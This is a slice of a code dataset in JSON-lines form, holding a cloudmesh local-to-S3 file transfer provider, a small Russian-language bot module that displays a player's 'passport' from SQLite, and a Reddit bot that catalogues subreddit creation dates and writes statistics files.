{self.target_kind} is \"\n f\"made.\")\n except ClientError as e:\n Console.error(e, prefix=True, traceflag=True)\n\n elif self.kind == \"gcpbucket\":\n print(\"Create GCP connection.\")\n raise NotImplementedError\n else:\n raise NotImplementedError\n\n # TODO - check hor to pass recursive argument from master provider & transfer.py\n\n def list(self, service=None, sourceObj=None, recursive=False):\n \"\"\"\n Method to enlist all objects of target location.\n\n :param service: local/azureblob/gcpbucket\n :param sourceObj: source directory or file\n :param recursive: Boolean to indicate if sub components to be enlisted\n :return: list of lists containing objects from target location\n \"\"\"\n if self.source_kind == \"azureblob\":\n Console.error(\"This command should flow to azure provider. Please \"\n \"check.\")\n return\n elif self.source_kind == \"gcpbucket\":\n Console.error(\"This command should flow to gcp provider. Please \"\n \"check.\")\n return\n elif self.source_kind == \"awss3\":\n Console.error(\"This command should flow to AWS provider. Please \"\n \"check.\")\n return\n elif self.source_kind == \"local\":\n banner(f\"Executing list method for local storage:\\nSource object \"\n f\"is {self.local_location}\")\n if self.local_location.exists():\n if self.local_location.expanduser().is_file():\n os.chdir(os.path.split(self.local_location.expanduser())[0])\n\n if len(glob(sourceObj)) > 0:\n Console.ok(\"List of file(s):\\n\"\n f\"{self.local_location.expanduser()}\")\n else:\n Console.error(f\"File not found \"\n f\"{self.local_location.expanduser()}\")\n elif self.local_location.expanduser().is_dir():\n os.chdir(self.local_location.expanduser())\n Console.ok(f\"List if files in {self.local_location}:\\n\")\n for f in glob(\"**\", recursive=recursive):\n print(Path.cwd() / f)\n else:\n Console.error(f\"Source object {self.local_location} does not \"\n f\"exist.\")\n else:\n raise NotImplementedError\n return {}\n\n def delete(self, service=\"local\", sourceObj=None, recursive=False):\n \"\"\"\n This method deletes file(s) / folder(s) from the source location.\n\n :param service: \"local\" for this provider\n :param sourceObj: A file or folder to delete\n :param recursive: Delete files from folder/subfolders\n :return: None\n \"\"\"\n if self.source_kind == \"azureblob\":\n Console.error(\"This command should flow to AWS provider. Please \"\n \"check.\")\n return\n elif self.source_kind == \"gcpbucket\":\n Console.error(\"This command should flow to AWS provider. Please \"\n \"check.\")\n return\n elif self.source_kind == \"local\":\n banner(f\"Executing delete method for local storage:\\nSource object \"\n f\"is {self.local_location}\")\n\n if self.local_location.exists():\n if self.local_location.expanduser().is_file():\n os.chdir(os.path.split(self.local_location.expanduser())[0])\n\n if len(glob(sourceObj)) > 0:\n Console.ok(\"Following file will be removed:\\n\"\n f\"{self.local_location.expanduser()}\")\n os.remove(self.local_location.expanduser())\n else:\n Console.error(f\"File not found \"\n f\"{self.local_location.expanduser()}\")\n elif self.local_location.expanduser().is_dir():\n os.chdir(self.local_location.expanduser())\n Console.ok(f\"Following objects will be removed from: \"\n f\"{self.local_location}:\\n\")\n for f in glob(\"**\", recursive=recursive):\n print(Path.cwd() / f)\n\n shutil.rmtree(self.local_location.expanduser())\n else:\n Console.error(\n f\"Source object {self.local_location} does not exist.\")\n else:\n raise NotImplementedError\n return {}\n\n def s3_bucket_exists(self, target_container):\n \"\"\" ##FIX CODE FROM Here ##\n Determine whether bucket_name exists and the user has permission to\n access it\n\n :param target_container: azure blob name\n :return: True if the referenced bucket_name exists, otherwise False\n \"\"\"\n try:\n resp_exists = self.s3_client.head_bucket(Bucket=target_container)\n except ClientError as e:\n return False\n return True\n\n def copy(self, service=\"local\", sourceObj=\"abcd.txt\", target=\"aws\",\n targetObj=None, debug=True):\n \"\"\"\n copy method copies files/directories from local storage to target CSP\n\n :param service: \"local\" for this provider\n :param sourceObj: A file/directory to be copied\n :param targetObj: Name of the target object\n :param debug: Boolean indicating debug mode\n :return: None\n \"\"\"\n # To copy the whole cmStorage directory, pls provide sourceObj=None\n\n if self.s3_bucket_exists(self.target_container):\n Console.ok(f\"AWS S3 bucket {self.target_container} exists.\")\n\n # TODO : Check CLI option\n # CLI option\n # aws s3 cp C:\\Users\\kpimp\\cmStorage\n # s3://bucket-iris.json/cmStorage --recursive\n\n if sourceObj:\n self.local_location = Path(self.yaml_content_source['default'][\n 'directory'], sourceObj)\n print(\"=====> local location \", self.local_location)\n else:\n sourceObj = \"cmStorage\"\n self.local_location = self.yaml_content_source['default'][\n 'directory']\n\n if targetObj is None:\n targetObj = sourceObj\n\n source_path = Path(self.local_location)\n\n try:\n if source_path.expanduser().is_file():\n # TODO: Use queue here\n print(f\"Copying file. Pushed {source_path} to the queue.\")\n os.chdir(os.path.split(self.local_location.expanduser())[0])\n print(\"chdir to \", os.getcwd())\n try:\n response = self.s3_client.upload_file(sourceObj,\n self.target_container,\n targetObj)\n Console.ok(f\"Uploaded: {sourceObj}\")\n except ClientError as e:\n Console.error(f\"Error while uploading {source_path} \"\n f\"to S3 bucket: \\n\", e)\n elif source_path.expanduser().is_dir():\n print(\"Copying directory recursively\")\n os.chdir(source_path.expanduser())\n print(\"chdir to \", os.getcwd())\n\n for file in glob('**', recursive=True):\n # TODO: This creates files as foldername/filename\n # Check how to create directory structure in S3\n\n print(file)\n if Path(file).is_file():\n # TODO: Use queue here\n print(f\"Pushed {Path(file)} to the queue {file}.\")\n targetObj = file\n try:\n response = self.s3_client.upload_file(file,\n self.target_container,\n targetObj)\n Console.ok(f\"Uploaded: {file}\")\n except ClientError as e:\n Console.error(\n f\"Error while uploading {source_path} \"\n f\"to S3 bucket: \\n\", e)\n else:\n Console.error(f\"Invalid source object type: {source_path}\")\n return\n except Exception as e:\n print(e)\n\n else:\n Console.error(f\"AWS S3 bucket {self.target_container} does not \"\n f\"exist.\")\n\n\ndef main():\n print(\"Instantiating\")\n # following instantiating for copy command\n instance = Provider(service=\"local\", sourceObj=\"abcd.txt\", target=\"aws\",\n targetObj=None, debug=True)\n\n # Instantiating for list/delete command\n # instance = Provider(service=\"local\", sourceObj=\"a\",\n # targetObj=None, debug=True)\n\n # instance.list(service=\"local\", sourceObj=\"a\", recursive=True)\n\n # instance.delete(service=\"local\", sourceObj=\"a\", recursive=True)\n\n instance.copy(service=\"local\", sourceObj='abcd.txt', target=\"aws\",\n targetObj=None, debug=True)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"project/cloudmesh-transfer/cloudmesh/transfer/providers/gcpbucket/Provider.py","file_name":"Provider.py","file_ext":"py","file_size_in_byte":14627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"402366216","text":"cursor.execute(\"SELECT * FROM users WHERE ID = ?\", ([str(from_id)]))\r\ninfo = cursor.fetchall()\r\n\r\nif info[0][7] > 0:\r\n\tgun = guns[(info[0][7])-1][0]\r\nelse:\r\n\tgun = '(Пусто)'\r\n\r\nif info[0][8] > 0:\r\n\tarmorr = armor[(info[0][8])-1][0]\r\nelse:\r\n\tarmorr = '(Пусто)'\r\n\r\nrank = list(ranks).index(info[0][3])\r\nrep = int(info[0][4])\r\n\r\nif rep >= ranks[list(ranks)[rank+1]][0]:\r\n\tcursor.execute(\"UPDATE users SET Status = '\"+str(list(ranks)[rank+1])+\"' WHERE ID = \"+str(from_id)+\"\")\r\n\r\nelif rep < ranks[list(ranks)[rank]][1] and rank != 0:\r\n\tcursor.execute(\"UPDATE users SET Status = '\"+str(list(ranks)[rank-1])+\"' WHERE ID = \"+str(from_id)+\"\")\r\n\r\nconn.commit()\r\n\r\ncursor.execute(\"SELECT * FROM users WHERE ID = ?\", ([str(from_id)]))\r\ninfo = cursor.fetchall()\r\nsend(user, '📖 Ваш паспорт:\\n\\n📄 Имя: '+info[0][1]+'.\\n\\n🎖 Звание: '+info[0][3]+'.\\n\\n🏆 Репутация: '+info[0][4]+'.\\n\\n⚔ Оружие: '+gun+', Броня: '+armorr+'.\\n\\n💰 Счет: '+str(info[0][2])+' патрон.')","sub_path":"modules/default/passport.py","file_name":"passport.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"126838526","text":"#/u/GoldenSights\nimport praw # simple interface to the reddit API, also handles rate limiting of requests\nimport bot\nimport time\nimport sqlite3\nimport datetime\nimport urllib\nimport json\nimport sys\nimport random\nimport os\nimport tkinter\nimport subprocess\n\n'''USER CONFIGURATION'''\n\nUSERAGENT = \"/u/GoldenSights SubredditBirthdays data collection: Gathering the creation dates of subreddits in the interest of information.\\\n More at https://github.com/voussoir/reddit/tree/master/SubredditBirthdays\"\n#This is a short description of what the bot does. For example \"/u/GoldenSights' Newsletter bot\"\n\nWAIT = 20\n#This is how many seconds you will wait between cycles. The bot is completely inactive during this time.\n\n'''All done!'''\n\nWAITS = str(WAIT)\n\n\nsql = sqlite3.connect('sql.db')\ncur = sql.cursor()\ncur2 = sql.cursor()\ncur.execute('CREATE TABLE IF NOT EXISTS subreddits(idint INT, idstr TEXT, created INT, human TEXT, name TEXT, nsfw INT, subscribers INT, jumble INT, subreddit_type INT, submission_type INT)')\ncur.execute('CREATE INDEX IF NOT EXISTS subindex ON subreddits(idint)')\nprint('Loaded SQL Database')\nsql.commit()\n# 0 - idint\n# 1 - idstr\n# 2 - created\n# 3 - human\n# 4 - name\n# 5 - nsfw\n# 6 - subscribers\n# 7 - jumble\n# 8 - subreddit type\n# 9 - submission type\nSQL_COLUMNCOUNT = 10\nSQL_IDINT = 0\nSQL_IDSTR = 1\nSQL_CREATED = 2\nSQL_HUMAN = 3\nSQL_NAME = 4\nSQL_NSFW = 5\nSQL_SUBSCRIBERS = 6\nSQL_JUMBLE = 7\nSQL_SUBREDDIT_TYPE = 8\nSQL_SUBMISSION_TYPE = 9\n\nprint('Logging in.')\nr = praw.Reddit(USERAGENT)\nr.login(bot.uG, bot.pG)\n\nolds = 0\nnoinfolist = []\nerrormess = None\nmonthnumbers = {\n\t\"Jan\":\"01\",\n\t\"Feb\":\"02\",\n\t\"Mar\":\"03\",\n\t\"Apr\":\"04\",\n\t\"May\":\"05\",\n\t\"Jun\":\"06\",\n\t\"Jul\":\"07\",\n\t\"Aug\":\"08\",\n\t\"Sep\":\"09\",\n\t\"Oct\":\"10\",\n\t\"Nov\":\"11\",\n\t\"Dec\":\"12\"\n}\n\nSUBREDDIT_TYPE = {\n\t'public':0,\n\t'restricted':1,\n\t'private':2,\n\t'archived':3,\n\tNone:4,\n\t'employees_only':5,\n\t'gold_restricted':6,\n\t'gold_only':6\n}\nSUBMISSION_TYPE = {\n\t'any':0,\n\t'link':1,\n\t'self':2,\n\tNone:3\n}\n\n\nLOWERBOUND_STR = '2qh0j'\nLOWERBOUND_INT = 4594339\n\nMEMBERFORMAT = '{idstr}, {human}, {nsfw}, {name}{spacer}{subscribers}'\n\n\ndef human(timestamp):\n\tday = datetime.datetime.utcfromtimestamp(timestamp)\n\thuman = datetime.datetime.strftime(day, \"%b %d %Y %H:%M:%S UTC\")\n\treturn human\n\ndef processi(sr, doupdates=True, enablekilling=False):\n\tglobal olds\n\tif 't5_' not in sr:\n\t\tsr = 't5_' + sr\n\tcur.execute('SELECT * FROM subreddits WHERE idint=?', [b36(sr[3:])])\n\tif not cur.fetchone() or doupdates==True:\n\t\tsro = r.get_info(thing_id=sr)\n\t\ttry:\n\t\t\tsro.id\n\t\t\tprocess(sro)\n\t\texcept AttributeError:\n\t\t\tprint('Could not fetch subreddit')\n\t\t\tif enablekilling:\n\t\t\t\ti = input('Kill?\\n> ')\n\t\t\t\tif i.lower() == 'y':\n\t\t\t\t\tkill(sr[3:])\n\telse:\n\t\tolds += 1\n\ndef process(sr, database=\"subreddits\", delaysaving=False, doupdates=True, isjumbled=False, nosave=False):\n\tglobal olds\n\tsubs = []\n\n\tif type(sr) == str:\n\t\tfor splitted in sr.split(','):\n\t\t\tsplitted = splitted.replace(' ', '')\n\t\t\tif doupdates==False:\n\t\t\t\tcur.execute('SELECT * FROM subreddits WHERE LOWER(name)=?', [splitted.lower()])\n\t\t\t\tif not cur.fetchone():\n\t\t\t\t\tsr = r.get_subreddit(splitted)\n\t\t\t\t\tsubs.append(sr)\n\t\t\t\telse:\n\t\t\t\t\tolds += 1\n\t\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tsr = r.get_subreddit(splitted)\n\t\t\t\tsubs.append(sr)\n\n\telif type(sr) == praw.objects.Submission or type(sr) == praw.objects.Comment:\n\t\tsr = sr.subreddit\n\t\tsubs.append(sr)\n\n\telse:\n\t\tsubs.append(sr)\n\n\tfor sub in subs:\n\t\ttry:\n\t\t\tidint = b36(sub.id)\n\t\t\tcur.execute('SELECT * FROM subreddits WHERE idint=?', [idint])\n\t\t\tf = cur.fetchone()\n\t\t\tif not f:\n\t\t\t\th = human(sub.created_utc)\n\t\t\t\tisnsfw = 1 if sub.over18 else 0\n\t\t\t\tsubscribers = sub.subscribers if sub.subscribers else 0\n\t\t\t\tisjumbled = 1 if isjumbled else 0\n\t\t\t\tprint('New: %s : %s : %s : %s : %d' % (sub.id, h, isnsfw, sub.display_name, subscribers))\n\t\t\t\tsubreddit_type = SUBREDDIT_TYPE[sub.subreddit_type]\n\t\t\t\tsubmission_type = SUBMISSION_TYPE[sub.submission_type]\n\t\t\t\tdata = ['.'] * SQL_COLUMNCOUNT\n\t\t\t\tdata[SQL_IDINT] = idint\n\t\t\t\tdata[SQL_IDSTR] = sub.id\n\t\t\t\tdata[SQL_CREATED] = sub.created_utc\n\t\t\t\tdata[SQL_HUMAN] = h\n\t\t\t\tdata[SQL_NSFW] = isnsfw\n\t\t\t\tdata[SQL_NAME] = sub.display_name\n\t\t\t\tdata[SQL_SUBSCRIBERS] = subscribers\n\t\t\t\tdata[SQL_JUMBLE] = isjumbled\n\t\t\t\tdata[SQL_SUBREDDIT_TYPE] = subreddit_type\n\t\t\t\tdata[SQL_SUBMISSION_TYPE] = submission_type\n\t\t\t\tcur.execute('INSERT INTO subreddits VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', data)\n\t\t\telif doupdates:\n\t\t\t\tif sub.subscribers != None:\n\t\t\t\t\tsubscribers = sub.subscribers\n\t\t\t\telse:\n\t\t\t\t\tsubscribers = 0\n\t\t\t\th = human(sub.created_utc)\n\t\t\t\tisnsfw = 1 if sub.over18 else 0\n\t\t\t\tif isjumbled is True or int(f[SQL_JUMBLE]) == 1:\n\t\t\t\t\tisjumbled = 1\n\t\t\t\telse:\n\t\t\t\t\tisjumbled = 0\n\t\t\t\tsubreddit_type = SUBREDDIT_TYPE[sub.subreddit_type]\n\t\t\t\tsubmission_type = SUBMISSION_TYPE[sub.submission_type]\n\t\t\t\toldsubs = f[SQL_SUBSCRIBERS]\n\t\t\t\tsubscriberdiff = subscribers - oldsubs\n\t\t\t\tprint('Upd: %s : %s : %s : %s : %d (%d)' % (sub.id, h, isnsfw, sub.display_name, subscribers, subscriberdiff))\n\t\t\t\tcur.execute('UPDATE subreddits SET subscribers=?, jumble=?, subreddit_type=?, submission_type=? WHERE idint=?',\n\t\t\t\t\t[subscribers, isjumbled, subreddit_type, submission_type, idint])\n\t\t\t\tolds += 1\n\t\t\telse:\n\t\t\t\tolds += 1\n\t\t\tif not delaysaving and not nosave:\n\t\t\t\tsql.commit()\n\t\texcept praw.requests.exceptions.HTTPError:\n\t\t\tprint('HTTPError:', sub)\n\tif not nosave:\t\t\t\n\t\tsql.commit()\n\n\ndef chunklist(inputlist, chunksize):\n\tif len(inputlist) < chunksize:\n\t\treturn [inputlist]\n\telse:\n\t\toutputlist = []\n\t\twhile len(inputlist) > 0:\n\t\t\toutputlist.append(inputlist[:chunksize])\n\t\t\tinputlist = inputlist[chunksize:]\n\t\treturn outputlist\n\ndef processmega(srinput, isrealname=False, chunksize=100, docrash=False, delaysaving=False, doupdates=True, nosave=False):\n\tglobal olds\n\tglobal noinfolist\n\t#This is the new standard in sr processing\n\t#Other methods will be deprecated\n\t#Heil\n\tif type(srinput) == str:\n\t\tsrinput = srinput.replace(' ', '')\n\t\tsrinput = srinput.split(',')\n\n\tif isrealname == False:\n\t\tremaining = len(srinput)\n\t\tfor x in range(len(srinput)):\n\t\t\tif 't5_' not in srinput[x]:\n\t\t\t\tsrinput[x] = 't5_' + srinput[x]\n\t\tsrinput = chunklist(srinput, chunksize)\n\t\tfor subset in srinput:\n\t\t\ttry:\n\t\t\t\tprint(subset[0] + ' - ' + subset[-1], remaining)\n\t\t\t\tsubreddits = r.get_info(thing_id=subset)\n\t\t\t\ttry:\n\t\t\t\t\tfor sub in subreddits:\n\t\t\t\t\t\tprocess(sub, delaysaving=delaysaving, doupdates=doupdates, nosave=nosave)\n\t\t\t\texcept TypeError:\n\t\t\t\t\tnoinfolist = subset[:]\n\t\t\t\t\tif len(noinfolist) == 1:\n\t\t\t\t\t\tprint('Received no info. See variable `noinfolist`')\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor item in noinfolist:\n\t\t\t\t\t\t\tprocessmega([item])\n\n\t\t\t\tremaining -= len(subset)\n\t\t\texcept praw.requests.exceptions.HTTPError as e:\n\t\t\t\tprint(e)\n\t\t\t\tprint(vars(e))\n\t\t\t\tif docrash:\n\t\t\t\t\traise Exception(\"I've been commanded to crash\")\n\telse:\n\t\tfor subname in srinput:\n\t\t\tprocess(subname)\n\n\ndef processrand(count, doublecheck=False, sleepy=0, delaysaving=False, doupdates=True):\n\t\"\"\"\n\tGets random IDs between a known lower bound and the newest collection\n\t*int count= How many you want\n\tbool doublecheck= Should it reroll duplicates before running\n\tint sleepy= Used to sleep longer than the reqd 2 seconds\n\t\"\"\"\n\tglobal olds\n\tolds = 0\n\tlower = LOWERBOUND_INT\n\n\tcur.execute('SELECT * FROM subreddits ORDER BY idint DESC LIMIT 1')\n\tupper = cur.fetchone()[SQL_IDSTR]\n\tprint('<' + b36(lower).lower() + ',', upper + '>', end=', ')\n\tupper = b36(upper)\n\ttotalpossible = upper-lower\n\tprint(totalpossible, 'possible')\n\trands = []\n\tif doublecheck:\n\t\tallids = [x[SQL_IDSTR] for x in fetched]\n\tfor x in range(count):\n\t\trand = random.randint(lower, upper)\n\t\trand = b36(rand).lower()\n\t\tif doublecheck:\n\t\t\twhile rand in allids or rand in rands:\n\t\t\t\tif rand in allids:\n\t\t\t\t\tprint('Old:', rand, 'Rerolling: in allid')\n\t\t\t\telse:\n\t\t\t\t\tprint('Old:', rand, 'Rerolling: in rands')\n\t\t\t\trand = random.randint(lower, upper)\n\t\t\t\trand = b36(rand).lower()\n\t\t\t\tolds += 1\n\t\trands.append(rand)\n\n\trands.sort()\n\tprocessmega(rands, delaysaving=delaysaving, doupdates=doupdates)\n\n\tprint('Rejected', olds)\n\ndef kill(sr):\n\tdata = ['.'] * SQL_COLUMNCOUNT\n\tdata[SQL_IDINT] = b36(sr)\n\tdata[SQL_IDSTR] = sr\n\tdata[SQL_CREATED] = 0\n\tdata[SQL_HUMAN] = None\n\tdata[SQL_NSFW] = None\n\tdata[SQL_NAME] = None\n\tdata[SQL_SUBSCRIBERS] = None\n\tdata[SQL_JUMBLE] = 0\n\tdata[SQL_SUBREDDIT_TYPE] = None\n\tdata[SQL_SUBMISSION_TYPE] = None\n\tcur.execute('INSERT INTO subreddits VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)', data)\n\tsql.commit()\n\ndef fetchgenerator():\n\twhile True:\n\t\tfetch = cur.fetchone()\n\t\tif fetch is None:\n\t\t\tbreak\n\t\tyield fetch\n\ndef datetimedict(outputdict, timestamp, strftime):\n\tdtd = datetime.datetime.strftime(timestamp, strftime) # 01\n\toutputdict[dtd] = outputdict.get(dtd, 0) + 1\n\ndef show():\n\tfile_all_time = open('show\\\\all-time.txt', 'w')\n\tfile_all_name = open('show\\\\all-name.txt', 'w')\n\tfile_all_subscribers = open('show\\\\all-subscribers.txt', 'w')\n\tfile_dirty_time = open('show\\\\dirty-time.txt', 'w')\n\tfile_dirty_name = open('show\\\\dirty-name.txt', 'w')\n\tfile_dirty_subscribers = open('show\\\\dirty-subscribers.txt', 'w')\n\tfile_jumble_sfw = open('show\\\\jumble.txt', 'w')\n\tfile_jumble_nsfw = open('show\\\\jumble-nsfw.txt', 'w')\n\tfile_duplicates = open('show\\\\duplicates.txt', 'w')\n\tfile_missing = open('show\\\\missing.txt', 'w')\n\tfile_stats = open('show\\\\statistics.txt', 'w')\n\tfile_readme = open('README.md', 'r')\n\n\tcur.execute('SELECT COUNT(idint) FROM subreddits WHERE created != 0')\n\titemcount_valid = cur.fetchone()[0]\n\titemcount_nsfw = 0\n\tprint(itemcount_valid, 'subreddits')\n\n\tprint('Writing time files.')\n\tcur.execute('SELECT * FROM subreddits WHERE created !=0 ORDER BY created ASC')\n\tfor item in fetchgenerator():\n\t\titemf = memberformat(item)\n\t\tprint(itemf, file=file_all_time)\n\t\tif int(item[SQL_NSFW]) == 1:\n\t\t\tprint(itemf, file=file_dirty_time)\n\t\t\titemcount_nsfw += 1\n\tfile_all_time.close()\n\tfile_dirty_time.close()\n\n\tprint('Writing name files and duplicates.')\n\tpreviousitem = None\n\tinprogress = False\n\tcur.execute('SELECT * FROM subreddits WHERE created != 0 ORDER BY LOWER(name) ASC')\n\tfor item in fetchgenerator():\n\t\tif previousitem != None and item[SQL_NAME] == previousitem[SQL_NAME]:\n\t\t\tprint(memberformat(previousitem), file=file_duplicates)\n\t\t\tinprogress = True\n\t\telif inprogress:\n\t\t\tprint(memberformat(previousitem), file=file_duplicates)\n\t\t\tinprogress = False\n\t\tpreviousitem = item\n\n\t\titemf = memberformat(item)\n\t\tprint(itemf, file=file_all_name)\n\t\tif int(item[SQL_NSFW]) == 1:\n\t\t\tprint(itemf, file=file_dirty_name)\n\tfile_duplicates.close()\n\tfile_all_name.close()\n\tfile_dirty_name.close()\n\n\tprint('Writing subscriber files.')\n\trank_all = 1\n\trank_nsfw = 1\n\tcur.execute('SELECT * FROM subreddits WHERE created != 0 ORDER BY subscribers DESC')\n\tfor item in fetchgenerator():\n\t\tif rank_all <= 20000:\n\t\t\trankstr = commapadding(rank_all, ' ', 9)\n\t\t\trank_all += 1\n\t\telse:\n\t\t\trankstr = ''\n\t\titemf = memberformat(item)\n\t\tprint(itemf+rankstr, file=file_all_subscribers)\n\t\tif int(item[SQL_NSFW]) == 1:\n\t\t\tif rank_nsfw <= 20000:\n\t\t\t\trankstr = commapadding(rank_nsfw, ' ', 9)\n\t\t\t\trank_nsfw += 1\n\t\t\telse:\n\t\t\t\trankstr = ''\n\t\t\tprint(itemf+rankstr, file=file_dirty_subscribers)\n\tfile_all_subscribers.close()\n\tfile_dirty_subscribers.close()\n\n\tprint('Writing jumble.')\n\tcur.execute('SELECT * FROM subreddits WHERE jumble == 1 ORDER BY subscribers DESC')\n\tfor item in fetchgenerator():\n\t\titemf = memberformat(item)\n\t\tif int(item[SQL_NSFW]) == 0:\n\t\t\tprint(itemf, file=file_jumble_sfw)\n\t\telse:\n\t\t\tprint(itemf, file=file_jumble_nsfw)\n\tfile_jumble_sfw.close()\n\tfile_jumble_nsfw.close()\n\n\tprint('Writing missing.')\n\tcur.execute('SELECT * FROM subreddits WHERE created == 0 ORDER BY idint ASC')\n\tfor item in fetchgenerator():\n\t\tprint(item[SQL_IDSTR], file=file_missing)\n\tfile_missing.close()\n\n\n\tprint('Writing statistics.')\n\theadline = 'Collected {0:,} subreddits\\n'.format(itemcount_valid)\n\tstatisticoutput = headline + '\\n\\n'\n\tstatisticoutput += ' SFW: {0:,}\\n'.format(itemcount_valid - itemcount_nsfw)\n\tstatisticoutput += 'NSFW: {0:,}\\n\\n\\n'.format(itemcount_nsfw)\n\n\tcur.execute('SELECT * FROM subreddits WHERE created != 0 ORDER BY created DESC limit 20000')\n\tlast20k = cur.fetchall()\n\ttimediff = last20k[0][SQL_CREATED] - last20k[-1][SQL_CREATED]\n\tstatisticoutput += '%.2f subs are created each hour\\n' % (20000 / (timediff/3600))\n\tstatisticoutput += '%.2f subs are created each day\\n\\n\\n' % (20000 / (timediff/86400))\n\n\n\t################################\n\t# Breakdown by time period\n\t# hour of day, day of week, day of month, month of year, month-year, year\n\thoddict = {}\n\tdowdict = {}\n\tdomdict = {}\n\tmoydict = {}\n\tmyrdict = {}\n\tyerdict = {}\n\tcur.execute('SELECT * FROM subreddits WHERE created != 0')\n\tprint(' performing time breakdown')\n\tfor item in fetchgenerator():\n\t\tdt = datetime.datetime.utcfromtimestamp(item[SQL_CREATED])\n\n\t\tdatetimedict(hoddict, dt, '%H') # 01\n\t\tdatetimedict(dowdict, dt, '%A') # Monday\n\t\tdatetimedict(domdict, dt, '%d') # 01\n\t\tdatetimedict(moydict, dt, '%B') # January\n\t\tdatetimedict(myrdict, dt, '%b%Y') # Jan2015\n\t\tdatetimedict(yerdict, dt, '%Y') # 2015\n\n\tprint(' forming columns')\n\tplotnum = 0\n\tmodes = [None, 'day', None, 'month', None, 'monthyear']\n\tdicts = [hoddict, dowdict, domdict, moydict, yerdict, myrdict]\n\tfor index in range(len(dicts)):\n\t\td = dicts[index]\n\t\tdkeys_primary = list(d.keys())\n\t\tdkeys_primary.sort(key=d.get)\n\t\tdkeys_secondary = specialsort(dkeys_primary, modes[index])\n\t\tdvals = [d[x] for x in dkeys_secondary]\n\n\t\tfor keyindex in range(len(dkeys_primary)):\n\t\t\tkey = dkeys_primary[keyindex]\n\t\t\tval = d[key]\n\t\t\tval = '{0:,}'.format(val)\n\t\t\tspacer = 34 - (len(key) + len(val))\n\t\t\tspacer = '.' * spacer\n\t\t\tstatisticoutput += key + spacer + val\n\t\t\tstatisticoutput += ' ' * 8\n\n\t\t\tkey = dkeys_secondary[keyindex]\n\t\t\tval = d[key]\n\t\t\tval = '{0:,}'.format(val)\n\t\t\tspacer = 34 - (len(key) + len(val))\n\t\t\tspacer = '.' * spacer\n\t\t\tstatisticoutput += key + spacer + val\n\t\t\tstatisticoutput += '\\n'\n\t\tstatisticoutput += '\\n'\n\n\t\tplotbars(str(plotnum), [dkeys_secondary, dvals], colormid='#43443a', forcezero=True)\n\t\tplotnum += 1\n\t\tif d is myrdict:\n\t\t\tplotbars(str(plotnum), [dkeys_secondary[-15:], dvals[-15:]], colorbg=\"#272822\", colorfg=\"#000\", colormid=\"#43443a\", forcezero=True)\n\t\t\tplotnum += 1\n\t#\n\t# Breakdown by time period\n\t################################\n\tprint(statisticoutput, file=file_stats)\n\tfile_stats.close()\n\n\tprint('Updating Readme')\n\treadmelines = file_readme.readlines()\n\tfile_readme.close()\n\treadmelines[3] = '#####' + headline\n\treadmelines[5] = '#####[Today\\'s jumble](http://reddit.com/r/%s)\\n' % jumble(doreturn=True)[0]\n\tfile_readme = open('README.md', 'w')\n\tfile_readme.write(''.join(readmelines))\n\tfile_readme.close()\n\n\ttime.sleep(2)\n\tx = subprocess.call('PNGCREATOR.bat', shell=True, cwd='spooky')\n\tprint()\n\ndef memberformat(member, spacerchar='.'):\n\tidstr = commapadding(member[SQL_IDSTR], ' ', 5, forcestring=True)\n\thuman = member[SQL_HUMAN]\n\tnsfw = member[SQL_NSFW]\n\tname = member[SQL_NAME]\n\tsubscribers = '{0:,}'.format(member[SQL_SUBSCRIBERS])\n\tspacer = 35 - (len(name) + len(subscribers))\n\tspacer = spacerchar * spacer\n\tmember = MEMBERFORMAT.format(\n\t\tidstr=idstr,\n\t\thuman=human,\n\t\tnsfw=nsfw,\n\t\tname=name,\n\t\tspacer=spacer,\n\t\tsubscribers=subscribers)\n\treturn member\n\ndef commapadding(s, spacer, spaced, left=True, forcestring=False):\n\t'''\n\tGiven a number 's', make it comma-delimted and then\n\tpad it on the left or right using character 'spacer'\n\tso the whole string is of length 'spaced'\n\n\tProviding a non-numerical string will skip straight\n\tto padding\n\t'''\n\tif not forcestring:\n\t\ttry:\n\t\t\ts = int(s)\n\t\t\ts = '{0:,}'.format(s)\n\t\texcept:\n\t\t\tpass\n\n\tspacer = spacer * (spaced - len(s))\n\tif left:\n\t\treturn spacer + s\n\treturn s + spacer\n\ndef dictadding(targetdict, item):\n\tif item not in targetdict:\n\t\ttargetdict[item] = 1\n\telse:\n\t\ttargetdict[item] = targetdict[item] + 1\n\treturn targetdict\n\ndef specialsort(inlist, mode=None):\n\tif mode == 'month':\n\t\treturn ['January', 'February', 'March', \\\n\t\t\t\t'April', 'May', 'June', 'July', \\\n\t\t\t\t'August', 'September', 'October', \\\n\t\t\t\t'November', 'December']\n\tif mode == 'day':\n\t\treturn ['Sunday', 'Monday', 'Tuesday', \\\n\t\t\t\t'Wednesday', 'Thursday', 'Friday', \\\n\t\t\t\t'Saturday']\n\tif mode == 'monthyear':\n\t\ttd = {}\n\t\tfor item in inlist:\n\t\t\tnitem = item\n\t\t\tnitem = item.replace(item[:3], monthnumbers[item[:3]])\n\t\t\tnitem = nitem[3:] + nitem[:3]\n\t\t\ttd[item] = nitem\n\t\ttdkeys = list(td.keys())\n\t\t#print(td)\n\t\ttdkeys.sort(key=td.get)\n\t\t#print(tdkeys)\n\t\treturn tdkeys\n\tif mode is None:\n\t\treturn sorted(inlist)\n\n\ndef shown(startinglist, header, fileobj, nsfwmode=2):\n\t\"\"\"\n\tCreating Show files with filters\n\t*lst startinglist= the unfiltered list\n\t*str header= the header at the top of the file\n\t*obj fileobj= the file object to write to\n\t*int nsfwmode=\n\t 0 - Clean only\n\t 1 - Dirty only\n\t 2 - All\n\t\"\"\"\n\n\tnsfwyes = []\n\tnsfwno = []\n\tnsfwq = []\n\tfor item in startinglist:\n\t\tif item[3] == '1':\n\t\t\tnsfwyes.append(item)\n\t\telif item[3] == '?':\n\t\t\tnsfwq.append(item)\n\t\telse:\n\t\t\tnsfwno.append(item)\n\tprint(header, file=fileobj)\n\tif nsfwmode == 0 or nsfwmode == 2:\n\t\tfor member in nsfwno:\n\t\t\tprint(memberformat(member), file=fileobj)\n\t\tprint('\\n' + ('#'*64 + '\\n')*5, file=fileobj)\n\n\tif nsfwmode == 1 or nsfwmode == 